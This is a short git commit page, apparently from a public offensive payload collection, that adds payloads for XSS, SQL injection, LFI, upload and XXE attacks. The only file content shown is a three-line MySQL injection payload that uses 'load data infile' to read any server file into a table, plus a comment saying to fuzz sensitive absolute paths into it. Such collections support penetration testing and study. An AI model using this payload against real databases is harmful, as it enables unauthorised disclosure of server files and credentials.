More payloads for XSS/SQL/LFI/Upload and XXE

This commit is contained in:
Swissky
2017-06-04 17:22:26 +02:00
parent 58aed12c9d
commit 94470a2544
37 changed files with 2145 additions and 61 deletions

View File

@@ -0,0 +1,3 @@
# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;